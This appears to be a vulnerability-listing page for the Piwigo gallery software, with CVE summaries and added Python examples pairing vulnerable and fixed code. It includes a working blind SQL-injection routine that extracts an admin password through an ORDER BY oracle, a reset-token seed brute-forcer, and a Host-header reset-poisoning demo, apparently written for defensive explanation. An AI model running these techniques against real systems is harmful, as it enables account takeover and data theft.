📦 Piwigo

by Piwigo

🔍 What is Piwigo?

Description coming soon...

🛡️ Security Overview

⚠️ Known Vulnerabilities

CVE-2023-44393

CRITICAL CVSS 9.3 Oct 9, 2023

A reflected XSS vulnerability in Piwigo's admin interface allows attackers to inject malicious JavaScript via crafted URLs. Only authenticated administrators are affected when they visit malicious lin...

CVE-2023-33361

CRITICAL CVSS 9.8 May 23, 2023

Piwigo 13.6.0 contains a SQL injection vulnerability in the /admin/permalinks.php endpoint that allows attackers to execute arbitrary SQL commands. This affects all Piwigo installations running versio...

CVE-2020-19213

CRITICAL CVSS 9.8 May 6, 2022

CVE-2020-19213 is a SQL injection vulnerability in Piwigo's cat_move.php file that allows attackers to execute arbitrary SQL commands via the 'selection' parameter when moving categories. Attackers can...

CVE-2021-32615

CRITICAL CVSS 9.8 May 13, 2021

This vulnerability allows authenticated administrators in Piwigo 11.4.0 to perform SQL injection attacks via the order[0][dir] parameter in admin/user_list_backend.php. Attackers can potentially execu...

CVE-2024-48928

HIGH CVSS 7.5 Feb 24, 2026

Piwigo versions 14.x have a weak secret key generation vulnerability during installation. Attackers can brute-force the secret key in about one hour, potentially bypassing CSRF protection and generati...

CVE-2025-62406

HIGH CVSS 8.1 Nov 18, 2025

This vulnerability in Piwigo allows attackers to send password reset emails containing malicious links to legitimate users. By manipulating the Host header in HTTP requests, attackers can redirect use...
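The entry above describes password-reset poisoning: if the application rebuilds the link's origin from the Host header (or a proxy header such as X-Forwarded-Host), a forged request makes the server mail a link that points at the attacker's domain, and the reset token travels with it. The block below is an added example written for this page, not Piwigo's code; the configured URL, the header names honoured by the vulnerable variant, and the password.php path are assumptions for illustration. It shows the vulnerable construction beside a hardened one that derives the link from configuration and refuses requests whose Host does not match.

```python
from urllib.parse import urlencode, urlsplit

# Hypothetical site configuration for the example; Piwigo's real setting names
# are not reproduced here.
CONFIGURED_GALLERY_URL = "https://gallery.example.org/"


def reset_link_vulnerable(headers, token):
    """Vulnerable pattern: the link's origin is rebuilt from request headers the
    client controls. A proxy-forwarded host, if honoured, is just as attacker-chosen
    as Host itself."""
    host = headers.get("X-Forwarded-Host") or headers.get("Host", "")
    scheme = "https" if headers.get("X-Forwarded-Proto") == "https" else "http"
    return f"{scheme}://{host}/password.php?" + urlencode({"key": token})


def host_is_expected(headers, configured_url=CONFIGURED_GALLERY_URL):
    """Compare the request's Host against the configured site origin.

    urlsplit lower-cases the hostname and strips any port, so 'GALLERY.example.org:443'
    still matches, while an unknown or missing Host does not."""
    expected = urlsplit(configured_url).hostname
    presented = urlsplit("//" + headers.get("Host", "")).hostname or ""
    return presented == expected


def reset_link_fixed(headers, token, configured_url=CONFIGURED_GALLERY_URL):
    """Hardened pattern: build the link from the configured site URL only, and
    refuse to act on a request whose Host does not match that URL."""
    if not host_is_expected(headers, configured_url):
        raise ValueError("Host header does not match the configured site URL")
    return configured_url.rstrip("/") + "/password.php?" + urlencode({"key": token})


if __name__ == "__main__":
    # Constructed request headers standing in for what an attacker would send.
    poisoned = {"Host": "attacker.example"}
    print("vulnerable:", reset_link_vulnerable(poisoned, "t0k3n"))
    print("fixed     :", reset_link_fixed({"Host": "gallery.example.org"}, "t0k3n"))
```

Rejecting a mismatched Host, rather than only ignoring it, also closes the variant where some other part of the application still trusts the header.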

CVE-2023-37270

HIGH CVSS 7.6 Jul 7, 2023

Piwigo photo gallery software versions before 13.8.0 contain a SQL injection vulnerability in the administrator login screen. Attackers with any administrator access can execute arbitrary SQL statemen...

CVE-2023-27233

HIGH CVSS 8.8 May 17, 2023

CVE-2023-27233 is a SQL injection vulnerability in Piwigo's user_list_backend.php file that allows attackers to execute arbitrary SQL commands via the order[0][dir] parameter. This affects all Piwigo ...
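CVE-2021-32615 and CVE-2023-27233 above share the same sink: a sort direction taken from the request (order[0][dir]) and spliced into an ORDER BY clause. That clause cannot be protected with bound parameters, because SQL parameters carry values, not keywords, so the fix has to be an allowlist. The block below is an added example for this page, not Piwigo's code; its table, rows and column names are constructed. It shows how an injectable ORDER BY becomes a boolean oracle that leaks another row's data one character at a time, and the allowlisted form that closes it.

```python
import sqlite3
import string


def make_db():
    """Constructed sample data for the demonstration; this is not Piwigo's schema."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT, status TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (id, username, password, status) VALUES (?, ?, ?, ?)",
        [
            (1, "alice", "s3cret", "normal"),
            (2, "bob", "hunter2", "normal"),
            (3, "carol", "pw-carol", "normal"),
            (4, "admin", "Tr0ub4dor", "webmaster"),
        ],
    )
    return conn


def list_users_vulnerable(conn, direction):
    """Vulnerable pattern: the sort direction from the request is spliced into the SQL text."""
    sql = f"SELECT username FROM users ORDER BY status {direction}"
    return [row[0] for row in conn.execute(sql)]


def blind_oracle(conn, condition):
    """Turn the injectable ORDER BY into a boolean oracle.

    A second sort key is appended whose sign depends on the attacker's condition,
    so rows that tie on 'status' come out in ascending id order when the condition
    is true and in descending order when it is false."""
    payload = f"ASC, CASE WHEN ({condition}) THEN id ELSE -id END"
    names = list_users_vulnerable(conn, payload)
    return names.index("alice") < names.index("bob")


def extract_password(conn, username, alphabet=string.ascii_letters + string.digits):
    """Recover another user's stored value one character at a time through the oracle."""
    recovered = ""
    while True:
        position = len(recovered) + 1
        for ch in alphabet:
            condition = (
                f"(SELECT substr(password, {position}, 1) FROM users "
                f"WHERE username = '{username}') = '{ch}'"
            )
            if blind_oracle(conn, condition):
                recovered += ch
                break
        else:
            return recovered  # no character matched: end of the value


SORT_DIRECTIONS = {"asc": "ASC", "desc": "DESC"}


def is_valid_direction(direction):
    return str(direction).lower() in SORT_DIRECTIONS


def list_users_fixed(conn, direction):
    """Hardened pattern: ORDER BY keywords cannot be bound as parameters, so the
    request value is mapped onto a fixed keyword and anything else is rejected."""
    if not is_valid_direction(direction):
        raise ValueError("unsupported sort direction")
    keyword = SORT_DIRECTIONS[str(direction).lower()]
    return [row[0] for row in conn.execute(f"SELECT username FROM users ORDER BY status {keyword}")]


if __name__ == "__main__":
    db = make_db()
    print("recovered via ORDER BY oracle:", extract_password(db, "admin"))
    print("fixed, desc:", list_users_fixed(db, "desc"))
```

The same allowlist treatment applies to the column name (order[0][column] in the DataTables convention the parameter name suggests): map an index or name from the request onto a fixed list of column identifiers and never interpolate the raw value.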

CVE-2023-26876

HIGH CVSS 8.8 Apr 21, 2023

This SQL injection vulnerability in Piwigo allows remote attackers to execute arbitrary SQL commands via the filter_user_id parameter in the admin.php endpoint. Attackers could potentially read, modif...

CVE-2022-32297

HIGH CVSS 7.5 Jul 14, 2022

CVE-2022-32297 is a SQL injection vulnerability in Piwigo's search function that allows attackers to execute arbitrary SQL commands. This affects Piwigo v12.2.0 installations, potentially compromising...

CVE-2021-40553

HIGH CVSS 8.8 Jun 28, 2022

CVE-2021-40553 is a remote code execution vulnerability in Piwigo's LocalFiles Editor that allows attackers to execute arbitrary code on affected systems. This affects Piwigo 11.5.0 installations with...

CVE-2021-40317

HIGH CVSS 8.8 May 26, 2022

CVE-2021-40317 is a SQL injection vulnerability in Piwigo's admin.php file via the id parameter. This allows authenticated attackers to execute arbitrary SQL commands on the database. Only Piwigo admi...

CVE-2020-19216

HIGH CVSS 8.8 May 6, 2022

CVE-2020-19216 is a SQL injection vulnerability in Piwigo's admin/user_perm.php file via the cat_false parameter. Attackers can execute arbitrary SQL commands on the database, potentially compromisi...

CVE-2022-26267

HIGH CVSS 7.5 Mar 18, 2022

Piwigo v12.2.0 contains an information disclosure vulnerability in the admin maintenance actions page. Attackers can exploit this to leak sensitive information from the application. Only Piwigo instal...

CVE-2016-3735

HIGH CVSS 8.1 Jan 28, 2022

CVE-2016-3735 is a predictable password reset token vulnerability in Piwigo image gallery software. When certain criteria aren't met, Piwigo uses PHP's mt_rand() function to generate password reset to...
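CVE-2016-3735 here and CVE-2024-48928 above are the same class of weakness: a security-critical value (a reset token, a secret key) produced by a generator an attacker can reproduce or search, so a seed or key can be brute-forced rather than guessed. The block below is an added example for this page, not Piwigo's code, and does not reproduce how Piwigo derived either value; the timestamp seeding, the search window and the token format are assumptions chosen to make the search finish in milliseconds. It shows a Mersenne Twister token (the generator family behind PHP's mt_rand()) recovered from a guessable seed, beside the CSPRNG-backed, constant-time-compared replacement.

```python
import hmac
import random
import secrets


def weak_token(seed):
    """Constructed illustration of the weak pattern: a token drawn from a Mersenne
    Twister seeded with a guessable number (here, a Unix time in seconds).
    random.Random is MT19937, the same generator family as PHP's mt_rand()."""
    rng = random.Random(seed)
    return "".join(f"{rng.getrandbits(32):08x}" for _ in range(4))


def recover_seed(token, approx_time, window):
    """Attacker side: regenerate the token for every seed within +/- window seconds
    of the guessed issue time and return the one that matches, or None."""
    for seed in range(approx_time - window, approx_time + window + 1):
        if weak_token(seed) == token:
            return seed
    return None


def strong_token():
    """Hardened: 128 bits from the OS CSPRNG. There is no seed to recover, and the
    space is far beyond any brute-force budget."""
    return secrets.token_hex(16)


def token_matches(stored, presented):
    """Compare in constant time so the check itself does not leak the token byte by byte."""
    return hmac.compare_digest(stored, presented)


if __name__ == "__main__":
    issued_at = 1_700_000_000  # constructed issue time for the demonstration
    leaked = weak_token(issued_at)
    print("seed recovered:", recover_seed(leaked, issued_at + 45, window=120))
    print("strong token  :", strong_token())
```

The search cost scales with the uncertainty about the seed, not with the token length: a 32-bit seed space is roughly four billion candidates, which is exactly the kind of budget the "about one hour" figure for CVE-2024-48928 describes, whereas a 128-bit value from the OS generator has no seed to search for.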

CVE-2021-27973

HIGH CVSS 7.2 Apr 2, 2021

This SQL injection vulnerability in Piwigo allows attackers to execute arbitrary SQL commands via the language parameter in the admin.php?page=languages endpoint. It affects Piwigo installations befor...

CVE-2024-46606

MEDIUM CVSS 5.4 Oct 16, 2024

A stored cross-site scripting (XSS) vulnerability in Piwigo's photo description field allows attackers to inject malicious scripts that execute when administrators view the affected page. This affects...

CVE-2024-46333

MEDIUM CVSS 4.8 Sep 27, 2024

An authenticated cross-site scripting (XSS) vulnerability in Piwigo v14.5.0 allows attackers with album creation permissions to inject malicious scripts into album names. When other users view these a...